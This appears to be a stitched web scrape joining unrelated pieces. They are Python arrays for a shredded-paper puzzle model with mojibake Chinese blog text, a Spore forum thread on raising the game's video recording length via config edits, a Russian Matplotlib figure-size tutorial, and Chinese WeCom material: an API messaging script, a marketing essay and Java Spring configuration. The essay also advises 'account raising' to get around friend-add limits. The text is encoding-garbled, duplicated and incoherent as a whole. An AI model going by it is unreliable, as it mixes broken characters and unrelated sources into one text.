known[191]=[75, 11, 154, 190, 184, 2, 104, 180, 64, 106, 4,149,32,204,65,39,67,147]
known[159]=[139,1,129, 63, 138, 153, 53, 38, 123, 120, 175, 85, 50, 160, 187, 97, 203, 31]
impossible=[[] for i in range(0,num)] #å¦å®çæ¼æ¥
impossible[16]=[30,178,195,150,186,2,19,70,81,132]
impossible[122]=[109,197,32]
impossible[137]=[32]
impossible[204]=[4,54]
impossible[22]=[82]
impossible[12]=[120,149,159]
impossible[175]=[24,1]
impossible[158]=[30,195]
impossible[190]=[54,4]
impossible[144]=[197,32,178,195]
impossible[121]=[167,169]
impossible[150]=[130]
impossible[176]=[88]
impossible[141]=[182,70,81]
impossible[124]=[3]
impossible[138]=[102,0]
impossible[65]=[169,184,2]
impossible[165]=[9]
impossible[119]=[32,195,70]
impossible[27]=[177,195]
impossible[169]=[4]
impossible[62]=[126]
impossible[193]=[85,177]
impossible[162]=[70]
impossible[31]=[149]
impossible[184]=[202]
impossible[85]=[102]
impossible[57]=[88]
转载å°è¯·å
æ¬æ¬æå°åï¼https://kexue.fm/archives/3134
æ´è¯¦ç»ç转载äºå®è¯·åèï¼ãç§å¦ç©ºé´FAQã
妿æ¨è§å¾æ¬æè¿ä¸éï¼æ¬¢è¿å享/æèµæ¬æãæèµå¹¶éè¦ä»ä¸è·å¾æ¶çï¼èæ¯å¸æç¥éç§å¦ç©ºé´è·å¾äºå¤å°è¯»è
ççå¿å
³æ³¨ãå½ç¶ï¼å¦æä½ æ è§å®ï¼ä¹ä¸ä¼å½±åä½ çé
读ã忬¡è¡¨ç¤ºæ¬¢è¿åæè°¢ï¼
妿æ¨éè¦å¼ç¨æ¬æï¼è¯·åèï¼
èåæ. (Dec. 18, 2014). ãè¿å°ä¸å¹´ç建模ï¼åæ¢ç¢çº¸å¤å ã[Blog post]. Retrieved from https://kexue.fm/archives/3134
ä½ ä¹è®¸è¿å¯¹ä¸é¢çå 容æå ´è¶£
6个派çä¼åå¨çç®åä»ç»åå ¶å®ç°
ä»ä¹æ¶åå¤è¿ç¨çå 鿝å¯ä»¥å¤§äº1ï¼
åºäºæå°çµåççNLPåºï¼nlp zero
ç¨Numpyå®ç°é«æçAprioriç®æ³
å¢å¼ºtypechoçæç´¢åè½
åºäºfine tuneçå¾ååç±»ï¼ç¾åº¦åçç«èµï¼
åºäºXceptionçè ¾è®¯éªè¯ç è¯å«ï¼æ ·æ¬+代ç ï¼
Pythonçå¤è¿ç¨ç¼ç¨æå·§
ãå¤å¿ãPython䏿å¤é循ç¯çå ç§æè·¯
端å°ç«¯çè ¾è®¯éªè¯ç è¯å«ï¼46%æ£ç¡®çï¼
|
12-24-2020
Due to an unexpected database update fail, the forum had to undergo a reset to an August backup. This sadly means all new user registations and content posted between 08-08-2020 and 12-24-2020 has been wiped. We apologize for the inconvenience and have taken measures to prevent this error from happening in the future.
12-26-2020
Interested in a moderator position? Speak with Rob55Rod or Darhagonable on my personal Discord server or the official Spore Modding Community Discord server.
Due to an unexpected database update fail, the forum had to undergo a reset to an August backup. This sadly means all new user registations and content posted between 08-08-2020 and 12-24-2020 has been wiped. We apologize for the inconvenience and have taken measures to prevent this error from happening in the future.
12-26-2020
Interested in a moderator position? Speak with Rob55Rod or Darhagonable on my personal Discord server or the official Spore Modding Community Discord server.
There is no download needed for this mod.
To do this, you need to make 2 simple edits to 2 different .txt files in your Spore GA Data folder(Untested on Core Spore)...
Open ..Electronic Arts\SPORE_EP1\Data\Config folder...
Open ConfigManager.txt
Add floatprop recordMovieLength 5 on a new line at the bottom of file and save it.
Open Properties.txt
Add property recordMovieLength 0x0456f974 float 5 on a new line at the bottom of file and save it.
Launch Spore, Enjoy!
Tested for 5 seconds and it worked!
To do this, you need to make 2 simple edits to 2 different .txt files in your Spore GA Data folder(Untested on Core Spore)...
Open ..Electronic Arts\SPORE_EP1\Data\Config folder...
Open ConfigManager.txt
Add floatprop recordMovieLength 5 on a new line at the bottom of file and save it.
Open Properties.txt
Add property recordMovieLength 0x0456f974 float 5 on a new line at the bottom of file and save it.
Launch Spore, Enjoy!
Tested for 5 seconds and it worked!
So would the 5 be able to be replaced with 999999999999 to get a semi infinite record time?
Spore is creative, even the mods and hacks.
Or, should I say, especially the mods and hacks?
Now currently making content for the Life is Strange and Portal communities. Check me out on YouTube
Or, should I say, especially the mods and hacks?
Now currently making content for the Life is Strange and Portal communities. Check me out on YouTube
Thanks Davo! This is going to help with the recording of my anthems.
no problem, try these out as well...
Code: Select all
property recordMovieLength 0x0456f974 float 120 #default 2min
property recordMovieWidth 0x0456f975 int 320 #set type as int so it can be updated via options.txt when settings changes
property recordMovieHeight 0x0456f976 int 240
property recordMovieFPS 0x0456f977 float 15.0
property recordMovieQuality 0x0456f978 float 0.8
property recordMovieAudio 0x0456f979 bool true
property recordMovieNoUI 0x0456f97a bool true # don't capture UI
property recordMovieFrameUI 0x0641021a bool true # show REC frame when recording, can be disabled only when gameUI is enabled
i used these...
property recordMovieLength 0x0456f974 float 9999 #default 2min
property recordMovieWidth 0x0456f975 int 1920 #set type as int so it can be updated via options.txt when settings changes
property recordMovieHeight 0x0456f976 int 1080
property recordMovieFPS 0x0456f977 float 100.0
property recordMovieQuality 0x0456f978 float 1
property recordMovieAudio 0x0456f979 bool true
property recordMovieNoUI 0x0456f97a bool false # don't capture UI
property recordMovieFrameUI 0x0641021a bool true # show REC frame when recording, can be disabled only when gameUI is enabled
and these
floatprop recordMovieLength 9999
IntProp recordMovieWidth 1920
IntProp recordMovieHeight 1080
floatprop recordMovieFPS 100.0
floatprop recordMovieQuality 1
boolprop recordMovieAudio true
boolprop recordMovieNoUI false
boolprop recordMovieFrameUI true
the actual recording was choppy, maybe due to the 100 FPS
heres the video...
http://www.youtube.com/watch?v=jybn0tall1g
property recordMovieLength 0x0456f974 float 9999 #default 2min
property recordMovieWidth 0x0456f975 int 1920 #set type as int so it can be updated via options.txt when settings changes
property recordMovieHeight 0x0456f976 int 1080
property recordMovieFPS 0x0456f977 float 100.0
property recordMovieQuality 0x0456f978 float 1
property recordMovieAudio 0x0456f979 bool true
property recordMovieNoUI 0x0456f97a bool false # don't capture UI
property recordMovieFrameUI 0x0641021a bool true # show REC frame when recording, can be disabled only when gameUI is enabled
and these
floatprop recordMovieLength 9999
IntProp recordMovieWidth 1920
IntProp recordMovieHeight 1080
floatprop recordMovieFPS 100.0
floatprop recordMovieQuality 1
boolprop recordMovieAudio true
boolprop recordMovieNoUI false
boolprop recordMovieFrameUI true
the actual recording was choppy, maybe due to the 100 FPS
heres the video...
http://www.youtube.com/watch?v=jybn0tall1g
and of course, all of these properties are found in appproperties.trigger
Well, I'll say that this is a very nice find!
Spore is creative, even the mods and hacks.
Or, should I say, especially the mods and hacks?
Now currently making content for the Life is Strange and Portal communities. Check me out on YouTube
Or, should I say, especially the mods and hacks?
Now currently making content for the Life is Strange and Portal communities. Check me out on YouTube
Don't work for me. Help me. How to fix crash?
You not answer it.GIRGHGH wrote:??
Who were you speaking to and how would we know what you meant?
Nice, this'll do fine for my spore videos (Coming up on https://www.youtube.com/channel/UCK7-mA ... ZKXhPoInxA if you are interested.)
When the fish are plenty, our tribes don't enter war. However, when the fish are scarce, all out war ensues. Luckily for us, my tribe knows how to farm fish.
|
Изменить размер рисунка в Matplotlib
Matplotlib - одна из наиболее широко используемых библиотек визуализации данных в Python. Большая часть популярности Matplotlib связана с его параметрами настройки - вы можете настроить практически любой элемент из его иерархии объектов.
В этом уроке мы рассмотрим, как изменить размер фигуры в Matplotlib.
Создание сюжета
Сначала создадим простой график на фигуре:
import matplotlib.pyplot as plt
import numpy as np
x = np.arange(0, 10, 0.1)
y = np.sin(x)
plt.plot(x, y)
plt.show()
Здесь мы построили синусоидальную функцию, начиная от 0 и до 10 с шагом 0.1. Выполнение этого кода дает:
Объект Figure, если явно не создан, создается по умолчанию и содержит все элементы, которые мы можем и не можем видеть. Изменение размера Figure, в свою очередь, изменит размер наблюдаемых элементов.
Давайте посмотрим, как можно изменить размер фигуры.
Изменить размер рисунка в Matplotlib
Установите аргумент figsize
Во-первых, самый простой способ изменить размер фигуры - использовать аргумент figsize. Вы можете использовать этот аргумент либо при инициализации Pyplot, либо в существующем объекте Figure.
Давайте сначала изменим его во время инициализации:
import matplotlib.pyplot as plt
import numpy as np
x = np.arange(0, 10, 0.1)
y = np.sin(x)
plt.figure(figsize=(3, 3))
plt.plot(x, y)
plt.show()
Здесь мы получили доступ к экземпляру Figure, который был создан по умолчанию, и передали аргумент figsize. Обратите внимание, что размер определяется в дюймах, а не в пикселях. В результате получится фигура размером 3 на 3 дюйма:
Перед построением переменных важно установить размер фигуры.
Matplotlib / PyPlot в настоящее время не поддерживают размеры метрик, однако легко написать вспомогательную функцию для преобразования между ними:
def cm_to_inch(value):
return value/2.54
А затем отрегулируйте размер графика следующим образом:
plt.figure(figsize=(cm_to_inch(15),cm_to_inch(10)))
Это создаст участок размером 15 см на 10 см:
В качестве альтернативы, если вы создаете объект Figure для своего сюжета, вы можете сразу назначить размер:
import matplotlib.pyplot as plt
import numpy as np
x = np.arange(0, 10, 0.1)
y = np.sin(x)
z = np.cos(x)
fig = plt.figure(figsize=(8, 6))
# Adds subplot on position 1
ax = fig.add_subplot(121)
# Adds subplot on position 2
ax2 = fig.add_subplot(122)
ax.plot(x, y)
ax2.plot(x, z)
plt.show()
Здесь мы явно присвоили объекту возвращаемое значение функции figure(). Затем мы можем добавить оси к этой фигуре, чтобы создать несколько подзаголовков и построить на них график.
Мы использовали функцию add_subplot(), которая принимает ряд числовых значений. Первое число указывает, сколько строк вы хотите добавить к фигуре, второе число указывает, сколько столбцов вы хотите добавить, а третье число указывает номер графика, который вы хотите добавить.
Это означает, что если вы перейдете 111 в функцию add_subplots(), к рисунку будет добавлен один новый подзаголовок. Между тем, если бы вы использовали числа 221, полученный график имел бы четыре оси с двумя столбцами и двумя строками, а формируемый вами подзаголовок находится в 1-й позиции.
Этот код приводит к:
Установите высоту и ширину фигуры в Matplotlib
Вместо аргумента figsize мы также можем установить высоту и ширину фигуры. Это можно сделать либо с помощью функции set() с figheight и figwidth, или через функции set_figheight() и set_figwidth().
Первый позволяет вам написать одну строку для нескольких аргументов, а второй предоставляет более читаемый код.
Пойдем со вторым вариантом:
import matplotlib.pyplot as plt
import numpy as np
x = np.arange(0, 10, 0.1)
y = np.sin(x)
z = np.cos(x)
fig = plt.figure()
fig.set_figheight(5)
fig.set_figwidth(10)
# Adds subplot on position 1
ax = fig.add_subplot(121)
# Adds subplot on position 2
ax2 = fig.add_subplot(122)
ax.plot(x, y)
ax2.plot(x, z)
plt.show()
Этот код приводит к:
Наконец, вы также можете использовать эту функцию set_size_inches():
fig = plt.figure()
fig.set_size_inches(10, 5)
# Adds subplot on position 1
ax = fig.add_subplot(121)
# Adds subplot on position 2
ax2 = fig.add_subplot(122)
ax.plot(x, y)
ax2.plot(x, z)
plt.show()
И это работает так же, как установка аргумента figsize или использование двух функций:
|
开发商
腾讯
软件名称
企业微信
软件类型
办公平台
更新时间
2020年1月15日
推出时间
2016年4月18日
软件版本
V3.0.2
软件平台
iOS、Android、Windows、Mac
软件语言
简体中文
软件大小
107.56MB [2]
2019-07-07 21:59:31企业微信发送文件、信息到企业微信的教程
好久没有更新博客了,今天抽时间玩一个轻松的,想必大家平时上班也和我一样或多或少都会用到企业微信吧?不用也没关系,就当一个新技能GET一下也无妨;直接进入主题:来一个发送文件、信息到企业微信的教程,共勉。
第一步:如果您以前没有用过企业微信,那就直接下载注册一下即可,几分钟时间即可,用过也没关系,自己给自己注册一个单独的,独自当老板岂不乐哉,哈哈 下载地址
第二步:注册好企业微信之后,登陆企业微信官网,注册一个小程序,注册地址,如下图:
CORPID = 'XXX' # 企业ID CORPSECRET = 'XXX' # 钥匙 AGENTID = 'XXX' # 应用与小程序ID TOUSER = 'XXX' # 成员ID
'''获取access_token'''
url = 'https://qyapi.weixin.qq.com/cgi-bin/gettoken'
values = {
'corpid': self.CORPID,
'corpsecret': self.CORPSECRET,
}
req = requests.post(url, params=values)
data = json.loads(req.text)
return data["access_token"]
'''获取media_id'''
url = 'https://qyapi.weixin.qq.com/cgi-bin/media/upload?access_token={0}&type=file'.format(
self.get_access_token())
files = {'file': open(path, 'rb')}
req = requests.post(url, files=files)
data = json.loads(req.text)
return data["media_id"]
'''发送信息'''
send_url = 'https://qyapi.weixin.qq.com/cgi-bin/message/send?access_token=' + self.get_access_token()
send_data = '{"msgtype": "text", "safe": "0", "agentid": %s, "touser": "%s", "text": {"content": "%s"}}' % (
self.AGENTID, self.TOUSER, message)
try:
r = requests.post(send_url, send_data)
if json.loads(r.content)['errmsg'] == 'ok':
print('提示信息发送成功')
return True
raise Exception
except Exception:
return False
如果你觉得,这里上面代码有点麻烦,如若不嫌弃,点击–获取源码–已经为你整理好全部代码。
怎么利用
2020-01-19 12:05:08企业微信营销企业微信如何营销企业微信如何维护好友企业微信如何开通怎么利用企业微信营销企业微信如何营销企业微信如何维护好友企业微信如何开通等这些问题,看这一篇就够了: 前几天,企业微信开放了微信朋友圈和100个人的微信群,我看了各种新闻,发现很多人都不知道这个意味...
怎么利用企业微信营销 企业微信如何营销 企业微信如何维护好友 企业微信如何开通等这些问题,看这一篇就够了:
前几天,企业微信开放了微信朋友圈和100个人的微信群,我看了各种新闻,发现很多人都不知道这个意味着什么,或者是不知道怎么用企业微信来搞流量,所以特发此文。
从半年前,我们就开始实践用企业微信搞流量的事情,原因很简单:中国境内所有能上网的人,基本都用上了微信。对于一切商家来说,在这样一个数字化基础下,一定要考虑用微信做流量的可能性的。
其实,有很多商家,已经用个人微信的私域流量玩法获得了大量的用户和营收。个人微信私域流量的实际价值已经非常大,太多商家用微信一年做上亿的营收一点难度都没有。但是由于个人微信在官方那里并没有对应的营销工具,大家用的都是一些比较山寨的工具。而这些工具可能是严重违反了微信的政策,所以被封掉的几率很高,今年618当天据说有三千万个微信号被封,之后官方也一直对诱导式分享和外链盯的很紧。
腾讯一直没有To B的基因,这点可能情有可原,包括很多To C的公司,他们潜意识都认为广告是邪恶的,是破坏用户体验的。但我个人的观点是,只有把错误的信息传给错误的人是邪恶的。如果用户需要你的信息,即使是商业化的信息,他也是需要的。很多人可能不知道,百度上有很多搜索者,他就是奔着找一个商家而去搜索的,他们甚至还不会去浏览那些非广告的链接。比如用户出去旅游要办个签证、要注册一个公司......他们都希望直接找到一个能帮他们服务的商家。
好在腾讯现在终于想清楚了,传递高质量的信息才是王道,而广告并不邪恶。
这次企业微信开放朋友圈和微信群,被认为是官方开始支持私域流量。客观上看也可能是真的,因为毕竟“堵不如疏”,而且为什么这次偏偏开放的是朋友圈和微信群也是有所指的,私域流量就是要依靠这两个东西。
目前大家最关心的朋友圈和微信群的政策是这样的:(1)企业微信朋友圈的内容,可以出现在客户的个人微信朋友圈。但目前开通这个权限需要审核,机制也不完全透明。(2)企业微信客户群,把聊天人数上限从之前的20人提升到了100人,也是需要审核的。
虽然两大功能目前都收的比较紧,但根据腾讯以往的操作不难判断,日后会一点点开放出来。不管怎样,消息一出来,一些人开始叫好,一些人觉得鸡肋,但大部分人,对企业微信是没有什么概念的。
在介绍用企业微信搞流量的方法之前,我想和大家多聊几句我个人对于私域流量的看法,这也和本次企业微信的更新方向有着密切的关系。
一、私域流量的前世今生
私域流量这个概念在半年前成为了网红词汇,那个时候大家聊天,如果不提两句对于私域流量观点,就好像被时代淘汰了一样。也难怪今年坊间有个段子说:“我把你当朋友,你却把我当私域流量”,很犀利地展示了一幅商家用私域流量割韭菜的画面。
私域流量的前身可以追溯到灰黑产,比如卖茶女,杀猪盘等等。
(“杀猪盘攻略”,图片来自网络)
只是后来慢慢有人发现,这种打造ip人设,并设置一整套缜密运营机制引导转化的方式,不仅GMV非常感人,还能够复用到一些相对合规的商业模式中。也由此诞生了一些大家非常熟悉的品牌,比如k12教育领域中的 “跟谁学”,美妆品牌“完美日记“等等。但我认为玩正规私域流量的鼻祖其实是小米,它不断地把完全不知道它的用户,潜移默化地变成了它的死忠粉。
私域流量的精髓在于流量成本的计算。很多人计算流量成本都是短期内的静态计算方法,没有把时间考虑进去。有经验的人都知道:流量的第一次访问成本是最贵的。用私域流量这种方法圈到人之后,通过客户的后续经常访问,之后的流量成本基本可以越来越低。通过朋友圈,企业可以不断地触达用户,变相把第一次加人的成本摊薄了;
而在微信群中,可以通过奖品或团购砍价等等方法,诱使客户把裂变的信息发到朋友圈或其他微信群,进一步放大流量的效果,带来更多的流量。通过这样的裂变,以人带人,也摊薄了获客成本。
而最好玩的一点在于,私域流量的玩法是时间的朋友,只要长期地聪明地进行下去,就能够影响用户的心智,慢慢实现转化,甚至不断复购。如果流量池是一张大饼,私域流量就在不断地蚕食这张大饼,做公域流量的人一定会感受到来自做私域流量的人的压力。 流量思维已经过时,用户思维才是王道。
了解完这些,你才能知道为什么企业微信在这次升级时,瞄准了做私域流量最重要的两大阵地,朋友圈和微信群。
二、90%以上商家忽略了企业微信要养号
目前,很多人用企业微信搞流量,第一关就卡在了加人环节上。
首先,大家需要明白的一点是,就算认证了企业微信,也不代表可以肆无忌惮地批量加客户。毕竟,企业微信和任何一款腾讯系产品一样,是非常克制的,产品上有很多官方未公开的限制,一旦操作不当,企业号也可能会被限制添加好友,冻结甚至封号。
加人分两种情况:主动加客户和被客户加。
(1)主动扫客户的二维码加人.
(2)导入个人微信通讯录加人.
(3)搜索手机号加人.
(4)利用我们的工具从Excel中导入通讯录,然后从手机通讯录上加人, 工具地址是:查看工具
认证过的企业微信可以有2000个员工号,新号一般每个员工号连续加约60个客户,就会出现不能加人的情况。这也说明了企业微信号和微信个人号逻辑是一样的,每个号都有对应的权重,需要养号。
养号我建议从两个维度来展开:账号属性与账号行为。
先说账号属性:
(1)公司要进行主体认证与企业微信认证;
(2)企业员工的实名认证,有可能提示验证身份证号与人脸信息,这个是一定要操作的。
(3)企业微信绑定的个人微信号,是否是一个正常的个人号,之前有无违规行为等。
经历了企业微信的“个人认证+企业认证”之后,不仅你账号权重更高,对客户来说,他们那一端也能够看见你认证的信息,可信度远胜于微商。
至于账号行为上,可以用这样的养号方法:
首先,建议先把企业微信当作是一个企业内部正常的聊天工具,代替钉钉,平时员工之间就要聊起来,互传文件,偶尔发发红包之类的。
然后可以用一些其他的正向行为养号。我们通过半年的实践,发现了一个养号的秘诀:就是先把企业微信替代客服系统使用一段时间,然后再加人的时候就权重很高了。
比如在官网的下面,设置了一个联系客服的入口,放上了企业微信的二维码,用户可以很轻松的连接到我们。实践证明,这种和客户微信互动养号的方式,效率更高,权重积累的更快。
用这个方法还有一个好处,就是原本我们用企业微信的目标就是多加人,相比于其他渠道来的用户,可能没有比主动来咨询的人更精准的了。
被动加人也可能出现瓶颈,好在官方居然开发了“活码”功能,客户扫我们的活码,可以随机加给不同的客服或销售人员,这样既能保证员工作的公平,又能避免单个号当日加人达到上限的情况。
同时,微信设置的有些规则,有可能使得你个人微信的好友列表中,出现你的企业微信推荐信息。
三、消息群发+公众号是运营大杀器
除了企业微信员工号与客户一对一沟通,企业微信官方还提供了群发的接口,每个月有四次机会触达用户,形式包含纯文本、图文、链接、小程序等。
针对这项功能,我们可以有两种运营思路。
第一种,是官方提倡的个性化群发。即根据后台提供的用户标签功能,手动对用户进行分组,将信息传递给可能感兴趣的用户,实现精细化运营。
比如,你选择了知乎作为引流渠道,回答了一个关于“如何化妆”的问题,并附带了企业微信的个性二维码。当用户通过这个二维码加你为好友时,系统会自动给他打上“化妆”的标签,之后做个性化营销的时候,就能用到这些标签。
第二种运营思路,是把企业微信当作是服务号,无差别群发。同样是群发,和服务号相比,显然企业微信才是更优越的工具。
我们来做个对比:用服务号来写文章增粉,和用企业微信纯粹加人再来发文章。
首先对于客户来说,在微信个人号那边接收二者消息的方式是一样的,都是强提醒、都是一个月发送四次。那就是说企业微信也变相的是一种微信公众号。
我们从增粉的难易程度来对比:写一篇公众号文章再来增粉,以现在公众号的环境和大部分人的才华来看,每天增加100个粉丝都要使出吃奶的劲儿;而企业微信就不一样了,单个企业可拥有2000个员工账号,每个账号最高可添加25万个好友,对于稍微具备一点运营能力的企业来说,每天新增几千上万个新客户,绝非难事。我们之前用企业微信给用户群发了图文消息,回复率高达60%,远高于微信公众号。
我们可以想象,在今天或者未来,为了达到同一个营销效果,用公众号或企业微信,两种手段的执行成本和难度是不一样的,企业微信相当于统一了个人消息和公众号,更能发挥私域流量的优势。
但是,用企业微信无差别群发,一定会面临消息触达不精准的问题,用户会感到被打扰从而删除企业微信,相当于在公众号中点击“取关”。
四、“客户联系”中你不知道的玩法
除了群发工具,企业微信官方还在后台配置了几大给力的客户联系工具,能够衍生出很多很有趣的玩法。
企业微信后台的【欢迎语】功能可以试试。
【员工离职】。企业微信支持员工离职时,将其对接的客户资源转移到其他的员工号上面,沉淀企业客户资产的同时,保障对客户服务的连续性。
此处有一个坑——员工离职时,他之前所服务的老客户会收到一条通知,询问是否接受换一个人给自己提供服务,显然这里无可避免地会有一部分客户要流失掉,大家也不确定企业微信官方什么时候把这个坑填上。
因而我们的建议是,如果企业本身拥有庞大的销售或客服团队,那么最佳的解决方案是直接使用企业的公共账号为客户提供服务,即让流水的员工用铁打的账号。
【侧边栏】。这是一个比较有趣的模块,企业可以根据自身需要,把一些客户服务相关的高频信息放进页面,再添加到侧边栏中,组成一个可以一键触达的CRM系统,比如客户详情、商品列表、订单记录、快速回复常用语等等。侧边栏在PC端与移动端是同步的,可以发散出很多提高服务效率的玩法。
【垂直行业解决方案】。除了一些公共的功能模块,企业微信还针对一些特殊的行业提供了个性化解决方案。
(1)金融。金融行业本身有监管与合规等方面的要求,需要对服务客户的对话进行质检,官方针对这一点提供了会话存档的功能。
(2)教育。企业微信提供了家校沟通工具,老师与家长能够在保护好个人隐私的情况下,高效地互相触达,提高了沟通的效率。
(3)医院。紧急通知功能,患者可以立即联系到医生。
除了这些,大家在做运营的过程中,千万不要忽视了企业微信和小程序的协同。小程序这个生态从前比较难留存,就是因为小程序召回用户比较困难。以前一般小程序玩得比较好的商家,都是借用了微信群的召回能力的。
但是现在企业微信又为大家提供了一种更好的选择:导购用企业微信加用户微信好友后,可以向其发送内嵌产品介绍、试用体验等内容的小程序卡片,为其种草,用户点开后感兴趣,便可一键下单。
我认为企业微信真正有潜力的地方就是进一步打通了线上和线下,这恐怕也是微信官方以后会花大力气发展的地方。
有了企业微信,当商家和客户成为了好友之后,就可以给客户提供打破时空的服务。企业微信也在官方直播中提到了天虹商场的例子——过去的一年里,导购用企业微信账号加了顾客微信后,以朋友圈广告不断触达的方式,在增加了老客粘性的同时,增加了“闭店销售额”,这部分营业时间以外的销售额,占到了天虹全年营收的16%
更妙的部分在于,用户的体验也比以往更好了,实现了双赢:
"母婴用品店:店员在线下服务过程中,取得客户信任后,邀请客户添加企业微信,日常科普相关知识,推荐产品,提升复购率;
保险行业:保险购买是一项需要长期沟通的工作,一旦代理人离职,可以将客户资源交接回企业,新的代理人可通过历史聊天记录了解客户诉求,持续跟进后成交;
在线教育:企业所组建的每个学习群,都是一个班级,群主(管理员)可以借助针对教育行业的垂直解决方案实现授课、通知、作业布置等。"
五、关于企业微信的其他畅想
企业微信的这次升级,野心可能不在钉钉,而是一次巧妙的战略部署,旨在未来的“新零售”领域上分一杯羹。
阿里擅长资源整合,腾讯擅长用产品力里去穿透很多场景。作为线上支付界的龙头老大,腾讯瞄准的,是它强有力的竞争对手阿里最擅长的新零售——当阿里不断通过渠道资源整合,大规模收购线下的商场超市连锁店夫妻店时,腾讯通过强化自己的产品力,依靠11亿微信用户的流量优势,将线下服务与线上打通融合,“新零售”里各种商家资源和客户资源都掌握在企业微信手里的话,未来想象空间巨大。
今天这篇关于用企业微信搞流量的方法就先写到这里,欢迎随时和我们交流。
那么关于如何批量添加企业微信好友,看这一篇文章:https://dh.621225.com/blog/phone?phone_name=more 。
【
2020-09-09 10:03:10企业微信】企业微信开发整理(私有化部署企业微信/ 普通企业微信)使用工具类 ... ...--企业微信工具集 https://mvnrepository.com/artifact/com.github.binarywang/wx-java --> <dependency> <groupId>com.github.binarywang</groupId>...
使用工具类
1 pom引用
<!-- 企业微信工具集 https://mvnrepository.com/artifact/com.github.binarywang/wx-java -->
<dependency>
<groupId>com.github.binarywang</groupId>
<artifactId>weixin-java-cp</artifactId>
<version>3.9.0</version>
</dependency>
2 增加配置 application.yml
普通企业微信不需要配置baseApiUrl / oauth2redirectUri
# 微信相关 wechat: # 私有部署企业微信 privatecp: corpId: wwxxxxxxxxxx baseApiUrl: http://127.0.0.1:161 oauth2redirectUri: http://127.0.0.1:161 # 应用配置 appConfigs: - agentId: 1000001 secret: xxxxxxxxxxxxxxxxxxxxx - agentId: 1000002 secret: xxxxxxxxxxxxxxxxxxxxx
3 增加配置信息类
package com.xxx.auth.config;
import java.util.List;
import com.xxx.auth.urils.JsonUtils;
import org.springframework.boot.context.properties.ConfigurationProperties;
import lombok.Getter;
import lombok.Setter;
/**
* @author GuanWeiMail@163.com
*/
@Getter
@Setter
@ConfigurationProperties(prefix = "wechat.privatecp")
public class WxCpPrivateProperties {
/**
* 设置微信企业号的corpId
*/
private String corpId;
/**
* 基础api域名
*/
private String baseApiUrl;
/**
* oauth2 网页授权请求域名
*/
private String oauth2redirectUri;
/**
* 应用配置集合
*/
private List<AppConfig> appConfigs;
@Getter
@Setter
public static class AppConfig {
/**
* 设置微信企业应用的AgentId
*/
private Integer agentId;
/**
* 设置微信企业应用的Secret
*/
private String secret;
/**
* 设置微信企业号的token
*/
private String token;
/**
* 设置微信企业号的EncodingAESKey
*/
private String aesKey;
}
@Override
public String toString() {
return JsonUtils.toJson(this);
}
}
工具类
package com.tpln.auth.urils;
import com.fasterxml.jackson.annotation.JsonInclude.Include;
import com.fasterxml.jackson.core.JsonProcessingException;
import com.fasterxml.jackson.databind.ObjectMapper;
import com.fasterxml.jackson.databind.SerializationFeature;
/**
*
* Json工具类
* @author
*/
public class JsonUtils {
private static final ObjectMapper JSON = new ObjectMapper();
static {
JSON.setSerializationInclusion(Include.NON_NULL);
JSON.configure(SerializationFeature.INDENT_OUTPUT, Boolean.TRUE);
}
public static String toJson(Object obj) {
try {
return JSON.writeValueAsString(obj);
} catch (JsonProcessingException e) {
e.printStackTrace();
}
return null;
}
}
4 增加配置类
普通企业微信不需要配置baseApiUrl / oauth2redirectUri
package com.xxx.auth.config;
import java.util.Map;
import java.util.stream.Collectors;
import javax.annotation.PostConstruct;
import me.chanjar.weixin.cp.config.impl.WxCpDefaultConfigImpl;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.boot.context.properties.EnableConfigurationProperties;
import org.springframework.context.annotation.Configuration;
import com.google.common.collect.Maps;
import lombok.val;
import me.chanjar.weixin.cp.api.WxCpService;
import me.chanjar.weixin.cp.api.impl.WxCpServiceImpl;
import me.chanjar.weixin.cp.message.WxCpMessageRouter;
/**
* @Title: 私有部署企业微信配置类
* @Description: 集成企业微信认证
* @Version: v1.0
* @Author: Mr.Guan
* @Mail GuanWeiMail@163.com
* @DateTime: 2020-09-08 20:01:04
* @Package com.xxx.auth.config
*/
@Configuration
@EnableConfigurationProperties(WxCpPrivateProperties.class)
public class WxCpPrivateConfiguration {
/**
* 配置信息
*/
private WxCpPrivateProperties properties;
private static Map<Integer, WxCpMessageRouter> routers = Maps.newHashMap();
private static Map<Integer, WxCpService> cpServices = Maps.newHashMap();
@Autowired
public WxCpPrivateConfiguration(WxCpPrivateProperties properties) {
this.properties = properties;
}
public static Map<Integer, WxCpMessageRouter> getRouters() {
return routers;
}
public static WxCpService getCpService(Integer agentId) {
return cpServices.get(agentId);
}
/**
* 初始化Services
* 初始化多个企业应用
*/
@PostConstruct
public void initServices() {
cpServices = this.properties.getAppConfigs().stream().map(appConfig -> {
val configStorage = new WxCpDefaultConfigImpl();
//普通企业微信不需要配置baseApiUrl / oauth2redirectUri
configStorage.setBaseApiUrl(this.properties.getBaseApiUrl());
configStorage.setOauth2redirectUri(this.properties.getOauth2redirectUri());
configStorage.setCorpId(this.properties.getCorpId());
configStorage.setAgentId(appConfig.getAgentId());
configStorage.setCorpSecret(appConfig.getSecret());
configStorage.setToken(appConfig.getToken());
configStorage.setAesKey(appConfig.getAesKey());
val service = new WxCpServiceImpl();
service.setWxCpConfigStorage(configStorage);
routers.put(appConfig.getAgentId(), this.newRouter(service));
return service;
}).collect(Collectors.toMap(service -> service.getWxCpConfigStorage().getAgentId(), a -> a));
}
private WxCpMessageRouter newRouter(WxCpService wxCpService) {
final val newRouter = new WxCpMessageRouter(wxCpService);
return newRouter;
}
}
5 网页授权地址
http://127.0.0.1:161/connect/oauth2/authorize?appid=wwxxxxxxxxxx&redirect_uri=http://服务器ip:8889/auth/callback/WECHAT_ENTERPRISE&response_type=code&scope=SCOPE&agentid=1000001&state=STATE#wechat_redirect
参考
package com.xxx.auth.controller;
import cn.hutool.core.util.StrUtil;
import cn.hutool.json.JSONUtil;
import com.xxx.auth.config.WxCpPrivateConfiguration;
import com.xxx.auth.emnu.SourceInfoEnum;
import me.chanjar.weixin.cp.api.WxCpService;
import me.chanjar.weixin.cp.bean.WxCpOauth2UserInfo;
import me.chanjar.weixin.cp.bean.WxCpUser;
import org.springframework.web.bind.annotation.PathVariable;
import org.springframework.web.bind.annotation.RequestMapping;
import org.springframework.web.bind.annotation.RestController;
import javax.servlet.http.HttpServletRequest;
import java.util.Map;
/**
* @Title: 认证Controller
* @Description: 描述
* @Version: v1.0
* @Author: Mr.Guan
* @Mail GuanWeiMail@163.com
* @DateTime: 2020-08-24 20:01:04
*/
@RestController
@RequestMapping("auth")
public class AuthController {
public static void main(String[] args) {
System.out.println(SourceInfoEnum.valueOf("WECHAT_ENTERPRISE"));
}
